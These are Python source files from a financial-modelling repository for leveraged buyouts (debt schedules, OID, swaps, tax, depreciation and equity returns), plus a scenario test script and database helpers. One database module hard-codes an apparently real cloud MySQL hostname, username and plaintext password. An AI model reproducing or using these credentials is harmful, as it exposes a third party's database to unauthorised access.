                                 monthrange(row['date'].year, row['date'].month)[1]), axis=1)
            prepays_df['date'] = prepays_df.apply(
                lambda row: date(row['date'].year, row['date'].month,
                                 monthrange(row['date'].year, row['date'].month)[1]), axis=1)
            self.upsizes = upsizes_df.set_index('date')['value'].to_dict()
            self.prepays = prepays_df.set_index('date')['value'].to_dict()
        return self.upsizes, self.prepays

    def set_projected_revolver_change(self, forecast_start_month, scenario_assumptions_df):
        """Merge projected 'Revolver Change' assumptions into the schedules.

        Positive values become draws; non-positive values (sign-flipped)
        become repayments. Returns (draws, repayments).
        """
        scenario_assumptions_df['value'] = pd.to_numeric(scenario_assumptions_df['value'], downcast='float')
        upsizes_df = scenario_assumptions_df.loc[(scenario_assumptions_df.account == 'Revolver Change')
                                                 & (scenario_assumptions_df.value > 0)
                                                 & (scenario_assumptions_df.date_end >= forecast_start_month)][['date_end', 'value']].copy()
        prepays_df = scenario_assumptions_df.loc[(scenario_assumptions_df.account == 'Revolver Change')
                                                 & (scenario_assumptions_df.value <= 0)
                                                 & (scenario_assumptions_df.date_end >= forecast_start_month)][['date_end', 'value']].copy()
        prepays_df['value'] = - prepays_df['value']
        upsizes_df['date'] = upsizes_df.apply(
            lambda row: date(row['date_end'].year, row['date_end'].month,
                             monthrange(row['date_end'].year, row['date_end'].month)[1]), axis=1)
        prepays_df['date'] = prepays_df.apply(
            lambda row: date(row['date_end'].year, row['date_end'].month,
                             monthrange(row['date_end'].year, row['date_end'].month)[1]), axis=1)
        projected_upsizes_dict = upsizes_df.set_index('date')['value'].to_dict()
        for month in projected_upsizes_dict:
            self.upsizes[month] = self.upsizes.get(month, 0) + projected_upsizes_dict[month]
        projected_prepays_dict = prepays_df.set_index('date')['value'].to_dict()
        # NOTE(review): existing repayments are REDUCED by the projected
        # amount while draws are increased -- asymmetric; confirm this is
        # intended rather than `+`. Preserved as-is.
        for month in projected_prepays_dict:
            if month in self.prepays:
                self.prepays[month] = self.prepays[month] - projected_prepays_dict[month]
            else:
                self.prepays[month] = projected_prepays_dict[month]
        return self.upsizes, self.prepays
class OID:
    """Original Issue Discount schedule.

    Starts from balance * oidDiscount / 100 and accretes it monthly at a
    yield solved with fsolve so the accreted balance reaches `balance` at
    endDate. build_monthly_oid_payments returns {month_end: accretion}.
    """
    def __init__(self, balance, begin_date, end_date, oid_discount):
        self.balance = balance           # target balance the accretion must reach
        self.beginDate = begin_date
        self.endDate = end_date
        self.oidDiscount = oid_discount  # percentage applied to balance: start = balance * oidDiscount / 100
    # private function for calculating monthly accretions
    # (plain function, not a bound method: always invoked as OID.__balance_accretion(...))
    def __balance_accretion(balance, oid_discount, oid_ytm, begin_date, end_date):
        """Accrete balance*oid_discount/100 monthly at oid_ytm/12 up to
        end_date; returns (final accreted balance, {month_end: accretion})."""
        start_discounted_balance = balance * oid_discount / 100.0
        # if begin_date is already a month end, then start from the next month
        # NOTE(review): despite the comment above, the loop does NOT skip
        # begin_date's own month-end -- the first iteration accretes for it;
        # confirm intended.
        month_end = date(begin_date.year, begin_date.month, monthrange(begin_date.year, begin_date.month)[-1])
        month_begin_balance = start_discounted_balance
        monthly_oid_payments = {}
        while month_end < end_date:
            month_begin_balance += (1/12.0) * oid_ytm * month_begin_balance
            # NOTE(review): the recorded payment is computed on the
            # post-accretion balance, so it slightly exceeds the increment
            # just applied to month_begin_balance.
            monthly_oid_payments[month_end] = (1/12.0) * oid_ytm * month_begin_balance
            month_end = month_end + timedelta(days=1)
            month_end = date(month_end.year, month_end.month, monthrange(month_end.year, month_end.month)[-1])
        # final stub: one more month of accretion when the loop stopped
        # inside end_date's own month
        if month_end >= end_date and month_end.year == end_date.year and month_end.month == end_date.month:
            month_begin_balance += (1/12.0) * oid_ytm * month_begin_balance
            monthly_oid_payments[month_end] = (1/12.0) * oid_ytm * month_begin_balance
        return month_begin_balance, monthly_oid_payments
    # private function for calculating oid accretions
    def __oid_ytm_calc_wrapper(oid_ytm, *args):
        """fsolve objective: zero when the accreted balance equals `balance`."""
        balance, begin_date, end_date, oid_discount = args
        accretioned_balance, monthly_oid_payments = OID.__balance_accretion(balance, oid_discount, oid_ytm[0], begin_date, end_date)
        return balance - accretioned_balance
    def build_monthly_oid_payments(self):
        """Solve the monthly accretion yield for this OID and return the
        {month_end: accretion} schedule."""
        oid_ytm = 0.001  # starting guess for the solver
        oid_ytm = fsolve(OID.__oid_ytm_calc_wrapper, oid_ytm, args=(self.balance, self.beginDate, self.endDate, self.oidDiscount))
        reached_balance, monthly_oid_payments = OID.__balance_accretion(self.balance, self.oidDiscount, oid_ytm[0], self.beginDate, self.endDate)
        return monthly_oid_payments
    @staticmethod
    def calc_monthly_oid_payments(balance, begin_date, end_date, oid_discount):
        """Static variant of build_monthly_oid_payments for ad-hoc inputs."""
        oid_ytm = 0.001  # starting guess for the solver
        oid_ytm = fsolve(OID.__oid_ytm_calc_wrapper, oid_ytm, args=(balance, begin_date, end_date, oid_discount))
        reached_balance, monthly_oid_payments = OID.__balance_accretion(balance, oid_discount, oid_ytm[0], begin_date, end_date)
        return monthly_oid_payments
class DFC:
    """Deferred financing costs amortized over [beginDate, endDate] at
    dfcRate per year on debtBalance, prorated by actual days per month."""

    def __init__(self, debt_balance, begin_date, end_date, dfc_rate):
        self.debtBalance = debt_balance
        self.beginDate = begin_date
        self.endDate = end_date
        self.dfcRate = dfc_rate  # annual rate applied to debtBalance

    def build_monthly_dfc_payments(self):
        """Return {month_end: payment} over the instrument's life.

        The first month is prorated from beginDate; the final month is
        prorated up to endDate's day-of-month.

        Fixes vs the original:
        - removed a duplicated month_end initialization;
        - the final stub period now divides by the actual number of days in
          the year (365/366, with the +1), consistent with every other
          period, instead of days-minus-one.
        """
        monthly_dfc_payments = {}
        month_end = date(self.beginDate.year, self.beginDate.month,
                         monthrange(self.beginDate.year, self.beginDate.month)[-1])
        while month_end < self.endDate:
            number_of_days_for_period = month_end.day
            if month_end.year == self.beginDate.year and month_end.month == self.beginDate.month:
                # first (possibly partial) month runs from beginDate inclusive
                number_of_days_for_period = (month_end.day - self.beginDate.day) + 1
            number_of_days_for_year = (date(month_end.year, 12, 31) - date(month_end.year, 1, 1)).days + 1
            monthly_dfc_payments[month_end] = (number_of_days_for_period / number_of_days_for_year) * self.dfcRate * self.debtBalance
            month_end = month_end + timedelta(days=1)
            month_end = date(month_end.year, month_end.month,
                             monthrange(month_end.year, month_end.month)[-1])
        # final stub month (the loop stopped inside endDate's own month)
        if month_end >= self.endDate and month_end.year == self.endDate.year and month_end.month == self.endDate.month:
            number_of_days_for_period = self.endDate.day
            number_of_days_for_year = (date(self.endDate.year, 12, 31) - date(self.endDate.year, 1, 1)).days + 1
            monthly_dfc_payments[month_end] = (number_of_days_for_period / number_of_days_for_year) * self.dfcRate * self.debtBalance
        return monthly_dfc_payments
class Swap:
    """Interest-rate swap on a notional schedule: fixed rate vs a floating
    index fixing, with daily accrual aggregation into monthly rows."""
    def __init__(self, portfolio, instrument_id, index, trade_date, counterparty, swap_rates):
        self.portfolio = portfolio
        self.instrumentID = instrument_id
        self.index = index           # floating index instrument id in the rates frame
        self.tradeDate = trade_date
        self.counterparty = counterparty
        self.swapRates = swap_rates  # list of rows laid out as documented below
    """ date_fix_rate, date_start, date_end, notional, fix_rate, floating_rate, number_of_days, swap_per_day """
    def build_swap_interest_payments(self, index_df):
        """For each swap row, look up the month-end floating fixing, apply
        the 1% floor, and append floating_rate / number_of_days /
        swap_payment_perday to the row IN PLACE; returns self.swapRates."""
        for swap_info in self.swapRates:
            date_fix_rate = swap_info[0]
            date_start = swap_info[1]
            date_end = swap_info[2]
            notional = swap_info[3]
            fix_rate = swap_info[4]
            floating_rate = 0.0
            # normalize index periods to month-end dates for the join below
            index_df['adjusted_period'] = index_df.apply(lambda row: date(row['period'].year, row['period'].month, monthrange(row['period'].year, row['period'].month)[1]), axis=1)
            """ since fix_rate_date is always the prior month rate, there is no need to shift the libor again """
            # index_df['rate_use_date'] = index_df.apply(lambda row: dateUtils.get_one_month_later(row['adjusted_period']), axis=1)
            date_fix_rate = date(date_fix_rate.year, date_fix_rate.month, monthrange(date_fix_rate.year, date_fix_rate.month)[1])
            floating_rate = index_df.loc[(index_df.adjusted_period==date_fix_rate) & (index_df.instrument_id==self.index)]['value'].mean()
            """ for swap, floating side libor has a 1 percent floor """
            floating_rate = 0.01 if floating_rate < 0.01 else floating_rate
            number_of_days = (date_end - date_start).days
            # per-day net payment on an actual/365 basis; sign is positive
            # when fix_rate exceeds the floored floating rate
            swap_payment_perday = 1 / 365 * (fix_rate - floating_rate) * notional
            swap_info.append(floating_rate)
            swap_info.append(number_of_days)
            swap_info.append(swap_payment_perday)
        return self.swapRates
    def get_swap_rates_from_db(self):
        """Load this portfolio/instrument's swap leg rows from the liquidity DB."""
        swap_rates_df = dbLiquidity.get_swap(self.portfolio, self.instrumentID)
        self.swapRates = swap_rates_df[['date_fix_rate', 'date_start', 'date_end', 'notional', 'fix_rate']].values.tolist()
    def build_swap_payments_by_month(self, start_month, end_month):
        """Walk every day of every month in [start_month, end_month] and
        aggregate swap accruals into a monthly DataFrame with columns
        month_start/month_end/number_of_days/average_daily_notional/
        effective_interest_rate/total_interest_payment (+ instrument_id)."""
        index_month = start_month
        swap_payments_monthly_result_list = []
        while index_month <= end_month:
            index_month_start_date = date(index_month.year, index_month.month, 1)
            index_month_end_date = date(index_month.year, index_month.month, monthrange(index_month.year, index_month.month)[1])
            index_day = index_month_start_date
            total_days = 0.0
            total_balance = 0.0
            total_interest_payment = 0.0
            average_daily_notional = 0.0
            effective_interest_rate = 0.0
            # each day accrues under at most one swap row (first match wins)
            while index_day <= index_month_end_date:
                for swap_rate_info in self.swapRates:
                    if swap_rate_info[1] <= index_day and swap_rate_info[2] >= index_day:
                        total_balance += swap_rate_info[3]           # notional
                        total_interest_payment += swap_rate_info[7]  # per-day payment (see build_swap_interest_payments)
                        total_days += 1
                        break
                index_day = index_day + timedelta(1)
            if total_days != 0:
                average_daily_notional = total_balance / total_days
                # annualize the average daily payment into a rate on notional
                effective_interest_rate = total_interest_payment / total_days * 365 / average_daily_notional
            swap_payments_monthly_result_list.append([index_month_start_date, index_month_end_date, total_days, average_daily_notional, effective_interest_rate, total_interest_payment])
            # advance to the next month's month-end
            index_month = index_month + timedelta(1)
            index_month = date(index_month.year, index_month.month, monthrange(index_month.year, index_month.month)[1])
        swap_payments_monthly_result_df = pd.DataFrame(data=swap_payments_monthly_result_list, columns=['month_start','month_end','number_of_days','average_daily_notional','effective_interest_rate','total_interest_payment'])
        swap_payments_monthly_result_df['instrument_id'] = self.instrumentID
        return swap_payments_monthly_result_df
class LettersOfCredit:
    """Placeholder for letters-of-credit modeling (not yet implemented)."""
class TaxRegister():
    """Tracks a portfolio's effective tax rate, quarterly split ratios, and
    taxes already paid, and estimates quarterly tax payments."""

    def __init__(self, portfolio, effective_tax_rate=0.0, tax_split_ratio=None, paid_tax=None):
        # BUG FIX: the []/{} defaults were shared across every call in
        # Python; None sentinels give each instance fresh containers.
        self.portfolio = portfolio
        self.effectiveTaxRate = effective_tax_rate
        self.taxSplitRatio = [] if tax_split_ratio is None else tax_split_ratio  # quarterly split fractions
        self.paidTax = {} if paid_tax is None else paid_tax                      # {payment date: amount}

    def get_paid_tax_from_db(self, as_of_date):
        """Load this portfolio's paid-tax history from the liquidity DB."""
        paid_tax_dict = dbLiquidity.get_paid_tax(self.portfolio, as_of_date)
        self.paidTax = paid_tax_dict

    def calculate_tax_payment(self, year, total_oid, total_ebitda, total_dfc, total_tax_depreciation, total_interest_expense=None):
        """Estimate the four quarterly tax payments for `year`.

        Returns either total tax spread by taxSplitRatio, or -- when some
        quarters were already paid -- the paid amounts followed by the
        remaining tax split evenly over the outstanding quarters.
        """
        """ differs by portfolio """
        adj_interest_deduction_cap = 0.0
        if self.portfolio == 'Lightstone':
            # 30% interest-deduction cap: EBITDA basis through 2021, EBIT
            # (EBITDA less tax depreciation) basis afterwards; capped at
            # actual interest + OID when interest expense is supplied.
            # NOTE(review): resembles a US 163(j)-style limitation -- confirm.
            if year <= 2021:
                adj_interest_deduction_cap = total_ebitda * 0.3
                if total_interest_expense is not None:
                    adj_interest_deduction_cap = min([total_ebitda * 0.3, total_interest_expense + total_oid])
            else:
                adj_interest_deduction_cap = (total_ebitda - total_tax_depreciation) * 0.3
                if total_interest_expense is not None:
                    adj_interest_deduction_cap = min([(total_ebitda - total_tax_depreciation) * 0.3, total_interest_expense + total_oid])
        ebt = total_ebitda - adj_interest_deduction_cap - total_dfc - total_tax_depreciation
        total_tax = ebt * self.effectiveTaxRate
        paid_ptd_list = [self.paidTax[key] for key in sorted(self.paidTax.keys()) if key.year == year]
        if len(paid_ptd_list) == 0:
            return [total_tax * item for item in self.taxSplitRatio]
        remaining_quarters = 4 - len(paid_ptd_list)
        return paid_ptd_list + [(total_tax - sum(paid_ptd_list)) / remaining_quarters
                                for _ in range(remaining_quarters)]
class FixedAsset():
    """A depreciable fixed asset with straight-line tax depreciation and a
    half-year convention for the in-service / spend year."""

    def __init__(self, portfolio, entity_name, depreciation_method, depreciation_term,
                 in_service_year, initial_purchase_price, capex=None, depreciation_adjustment=None):
        # BUG FIX: {} defaults were shared across every call in Python;
        # None sentinels give each instance fresh containers.
        self.portfolio = portfolio
        self.entityName = entity_name
        self.depreciationMethod = depreciation_method  # only 'Straight Line' is modeled below
        self.depreciationTerm = depreciation_term      # years; 0 => non-depreciable (e.g. land)
        self.inServiceYear = in_service_year
        self.initialPurchasePrice = initial_purchase_price
        self.capex = {} if capex is None else capex                                           # {year: capex amount}
        self.depreciationAdjustment = {} if depreciation_adjustment is None else depreciation_adjustment

    def calcualte_tax_depreciation(self, additional_capex, year):
        """Straight-line tax depreciation for `year`, including prior capex
        and any `additional_capex` ({year: amount}).

        (Method-name typo preserved for existing callers; see the
        correctly-spelled alias below.)
        """
        if self.depreciationTerm == 0:
            # e.g. land: non-depreciable
            return 0
        total_tax_depreciation = 0
        if self.inServiceYear == year and self.depreciationMethod == 'Straight Line':
            # half-year convention in the in-service year
            total_tax_depreciation += self.initialPurchasePrice * 1/self.depreciationTerm / 2
        if self.inServiceYear < year and self.depreciationMethod == 'Straight Line':
            total_tax_depreciation += self.initialPurchasePrice * 1/self.depreciationTerm
        total_previous_year_capex = sum([self.capex[capex_year] for capex_year in self.capex if capex_year < year])
        # NOTE(review): only adjustments booked exactly one year earlier are
        # captured (adj_year + 1 == year); later years drop them -- confirm.
        total_previous_year_dep_adjustment = sum([self.depreciationAdjustment[adj_year] for adj_year in self.depreciationAdjustment if adj_year + 1 == year])
        total_tax_depreciation += total_previous_year_capex * 1 / self.depreciationTerm
        total_tax_depreciation += total_previous_year_dep_adjustment * 1 / self.depreciationTerm
        for capex_year in additional_capex:
            if capex_year < year:
                total_tax_depreciation += additional_capex[capex_year] * 1/self.depreciationTerm
        if year in additional_capex:
            # half-year convention on current-year spend
            total_tax_depreciation += additional_capex[year] * 1/self.depreciationTerm/2
        return total_tax_depreciation

    # Backward-compatible, correctly-spelled alias for new callers.
    calculate_tax_depreciation = calcualte_tax_depreciation
class Equity():
    """Equity tranche of an LBO: purchase economics, periodic cash sweeps,
    exit value, and IRR/MOIC calculations."""

    def __init__(self, name, purchase_price, debt_percentage, exit_multiple,
                 irr_frequency, exit_time, periodicity_months, exit_value=0.0):
        self.name = name
        self.purchasePrice = purchase_price
        self.debtPercentage = debt_percentage  # fraction of purchase price financed with debt
        self.exitMultiple = exit_multiple      # EBITDA multiple at exit
        self.irrFrequency = irr_frequency      # only 'annual' is implemented below
        self.exitTime = exit_time
        self.periodicityMonths = periodicity_months
        self.exitValue = exit_value

    def calculate_initial_equity(self):
        """Equity check at close: purchase price net of the debt-financed portion."""
        return self.purchasePrice - self.purchasePrice * self.debtPercentage

    def calculate_dollar_per_capacity(self, total_capacity, unit='$/Kw'):
        """Purchase price per unit of capacity (`unit` is informational only)."""
        return self.purchasePrice / total_capacity

    def calculate_exit_value(self, last_tweleve_months_ebitda):
        """Exit value = exit multiple x LTM EBITDA."""
        return self.exitMultiple * last_tweleve_months_ebitda

    def calculate_equity_sweep(self, forecast_month, available_cash):
        """Sweep positive available cash to equity on periodicity months; 0 otherwise."""
        if forecast_month.month % self.periodicityMonths != 0:
            return 0
        if available_cash > 0:
            return available_cash
        return 0

    def calculate_irr_and_moic(self, equity_cashflow, exit_value_less_debt):
        """Annual equity cash flows, IRR and MOIC.

        `equity_cashflow` is a date-indexed frame with an 'Equity - sweep'
        column (sweeps are sign-flipped into investor cash flows); the final
        year also receives `exit_value_less_debt`.
        Returns (cashflow list incl. initial equity, irr, moic).
        """
        if self.irrFrequency.lower() == 'annual':
            initial_equity = self.purchasePrice * (1 - self.debtPercentage)
            start_year = equity_cashflow.index.min().year
            end_year = equity_cashflow.index.max().year
            year_list = list(range(start_year, end_year + 1))
            equity_annual_cashflow_list = []
            for year in year_list:
                sweep = equity_cashflow.loc[date(year, 1, 31):date(year, 12, 31)]['Equity - sweep'].sum()
                if year == year_list[-1]:
                    cashflow_for_the_year = exit_value_less_debt - sweep
                else:
                    cashflow_for_the_year = -sweep
                equity_annual_cashflow_list.append(cashflow_for_the_year)
            equity_annual_cashflow_list = [-initial_equity] + equity_annual_cashflow_list
            # NOTE(review): np.irr was removed in NumPy 1.20+; the
            # replacement is numpy_financial.irr -- confirm the pinned
            # NumPy version before upgrading.
            return (equity_annual_cashflow_list,
                    np.irr(equity_annual_cashflow_list),
                    sum(equity_annual_cashflow_list) / initial_equity)
        # BUG FIX: this branch returned a 2-tuple while the success path
        # returns a 3-tuple; keep the arity consistent for unpacking callers.
        return [], 0.0, 0.0

    def calculate_equity_exit(self, index, last_tweleve_months_ebitda):
        """Exit proceeds when `index` is the exit period; 0 otherwise.

        BUG FIX: `self` was missing from the signature, so the first
        argument was bound as `self` and `self.exitTime` raised at runtime.
        """
        if index != self.exitTime:
            return 0
        return last_tweleve_months_ebitda * self.exitMultiple
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,745 | changliukean/KEAN3 | refs/heads/master | /database/dbGeneral.py | import mysql.connector
# Connection settings for the KEAN MySQL instance on AWS RDS.
# SECURITY NOTE(review): credentials are hard-coded in source control; move
# them to environment variables or a secrets manager and rotate the password.
HOST='kindledb.cfdmlfy5ocmf.us-west-2.rds.amazonaws.com'
USER='Andrew'
PASSWORD='Kindle01'
DATABASE='kean3'            # default schema used by this module
PROD_DATABASE = 'kean'      # production schema (per the PROD_ prefix)
def config_connection(host, user, password, database):
    """Open and return a new MySQL connection for the given credentials."""
    return mysql.connector.connect(host=host, user=user, password=password, database=database)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,746 | changliukean/KEAN3 | refs/heads/master | /scenario_master_testcase.py | from scenario_control.Scenario import Scenario, ScenarioMaster
from datetime import datetime, date
from financial.FSLI import FSLI
if __name__ == "__main__":
    # Manual smoke tests for Scenario / ScenarioMaster round-tripping against
    # the database. Scenario positional convention used throughout:
    # (module, table, portfolio, scenario, version[, comments]).
    print("here we start our testing script")
    print("---------------------------------------------")

    # Test case 1, load a financials scenario from database
    print("Test case 1, load a financials scenario from database")
    module = 'financials'
    table = 'financials_dev'
    portfolio = 'Lightstone'
    scenario = '2019 Dec AMR'
    version = 'v2'
    myFinancialsScenario = Scenario(module, table, portfolio, scenario, version)
    myFinancialsScenario.print_scenario()
    print("------------------------------------------------")
    myFinancialsScenarioMaster = ScenarioMaster(myFinancialsScenario)
    myFinancialsScenarioMaster.load_sm_fromdb()
    print(myFinancialsScenarioMaster)

    # Test case 2, initiate a financials scenario to database
    print("================================================")
    print("================================================")
    print("Test case 2, initiate a financials scenario to database")
    # we will get pure data matrix from KAT
    portfolio = 'Lightstone'

    # step 1. define the output scenario
    output_financials_scenario = Scenario('financials', 'financials_dev', portfolio, '2020 OOB Test Financials', 'v1', 'comments')

    # step 2. define the dispatch input scenario master
    output_dispatch_scenario = Scenario('dispatch', 'dispatch', portfolio, '2020 OOB Test Dispatch', 'v1', 'comments')
    output_dispatch_start_year = 2020
    output_dispatch_number_of_years = 6
    output_dispatch_forecast_start_month = date(2020, 2, 29)
    output_dispatch_valuation_date = date(2020, 1, 29)
    # Bug fix: the plant_characteristics entry previously listed `portfolio`
    # in the table slot and the table name in the portfolio slot, breaking the
    # (module, table, portfolio, ...) convention every other entry follows.
    dispatch_input_list = [
        ['curve', 'prices', portfolio, '2020 OOB Test Curve', 'v1', 'comments'],
        ['curve_basis', 'prices', portfolio, '2020 OOB Test Basis', 'v1', 'comments'],
        ['hourly_shaper', 'prices', portfolio, '2020 OOB Test Hourly Shaper', 'v1', 'comments'],
        ['plant_characteristics', 'plant_characteristics', portfolio, '2020 OOB Test PCUC', 'v1', 'comments'],
    ]
    dispatch_input_scenarios = [Scenario(*row) for row in dispatch_input_list]
    dispatch_scenario_master = ScenarioMaster(output_dispatch_scenario,
                                              output_dispatch_start_year,
                                              output_dispatch_number_of_years,
                                              output_dispatch_forecast_start_month,
                                              output_dispatch_valuation_date,
                                              inputScenarios=dispatch_input_scenarios)

    # step 3. define other input scenarios
    input_scenario_list = [
        ['actuals_accrual', 'gl_activities', portfolio, '2020 OOB all transactions', 'v1', 'comment'],
        ['actuals_cash', 'gl_activities', portfolio, '2020 OOB all invoices paidinfull', 'v1', 'comment'],
        ['project_reforecast', 'projects', portfolio, '2020 OOB project reforecast', 'v1', 'comment'],
        ['census', 'census', portfolio, '2020 OOB census', 'v1', 'comment'],
        ['labor_assumptions', 'assumptions', portfolio, '2020 OOB labor assumptions', 'v1', 'comment'],
        ['fsli_directload', 'assumptions', portfolio, '2020 OOB direct load fsli', 'v1', 'comment'],
        ['prior_forecast', 'financials_dev', portfolio, '2020 OOB prior forecast', 'v1', 'comment'],
        ['budget', 'financials_dev', portfolio, '2020 OOB budget', 'v1', 'comment'],
    ]
    financials_input_scenarios = [Scenario(*row) for row in input_scenario_list]

    # step 4. define financials scenario master
    # by default, financials have the same datetime information with dispatch
    financials_start_year = 2020
    financials_number_of_years = 6
    financials_forecast_start_month = date(2020, 2, 29)
    financials_valuation_date = date(2020, 1, 29)
    # Bug fix: this master was previously assigned to `dispatch_scenario_master`,
    # silently shadowing the dispatch master built above. Behavior is unchanged:
    # the financials master (which references the dispatch master) is what gets
    # saved, exactly as before.
    financials_scenario_master = ScenarioMaster(output_financials_scenario,
                                                financials_start_year,
                                                financials_number_of_years,
                                                financials_forecast_start_month,
                                                financials_valuation_date,
                                                inputScenarios=financials_input_scenarios,
                                                inputScenarioMasters=[dispatch_scenario_master])
    financials_scenario_master.save()

    # Test case 3, load the inserted financials scenario back from the database
    module = 'financials'
    table = 'financials_dev'
    portfolio = 'Lightstone'
    scenario = '2020 OOB Test Financials'
    version = 'v1'
    myFinancialsScenario = Scenario(module, table, portfolio, scenario, version)
    myFinancialsScenario.print_scenario()
    print("------------------------------------------------")
    myFinancialsScenarioMaster = ScenarioMaster(myFinancialsScenario)
    myFinancialsScenarioMaster.load_sm_fromdb()
    print(myFinancialsScenarioMaster)
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,747 | changliukean/KEAN3 | refs/heads/master | /database/dbLBO.py | import mysql.connector
from database.dbGeneral import HOST,USER,PASSWORD,DATABASE, PROD_DATABASE, config_connection
from sqlalchemy import create_engine
import pandas as pd
from datetime import datetime, date
def put_financials_lbo(ready_to_kean_lbo_financials_df, portfolio, scenario, version, overwrite_option=False):
    """Append LBO financials rows to the financials_lbo table.

    When overwrite_option is True, existing rows for the same
    (portfolio, scenario, version) key are deleted first. Rows are inserted
    in chunks of 3000 to keep statement sizes bounded.
    """
    if overwrite_option:
        connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
        try:
            # Parameterized delete: the original concatenated user-supplied
            # values into the SQL text, which is SQL-injection-prone and
            # breaks on values containing quotes.
            delete_sql_statment = """
            DELETE FROM financials_lbo
            where portfolio = %s and scenario = %s and version = %s;
            """
            cursor = connection_instance.cursor()
            cursor.execute(delete_sql_statment, (portfolio, scenario, version))
            connection_instance.commit()
        finally:
            # Ensure the connection is released even if the delete fails.
            connection_instance.close()
    engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
    engine = create_engine(engine_str, encoding='latin1', echo=True)
    step = 3000
    current_index = 0
    while current_index + step < len(ready_to_kean_lbo_financials_df):
        ready_to_kean_lbo_financials_df.iloc[current_index:current_index + step].to_sql(name='financials_lbo', con=engine, if_exists='append', index=False)
        current_index += step
    # Flush the final (possibly partial) chunk.
    ready_to_kean_lbo_financials_df.iloc[current_index:].to_sql(name='financials_lbo', con=engine, if_exists='append', index=False)
def get_financials_lbo(portfolio, scenario, version):
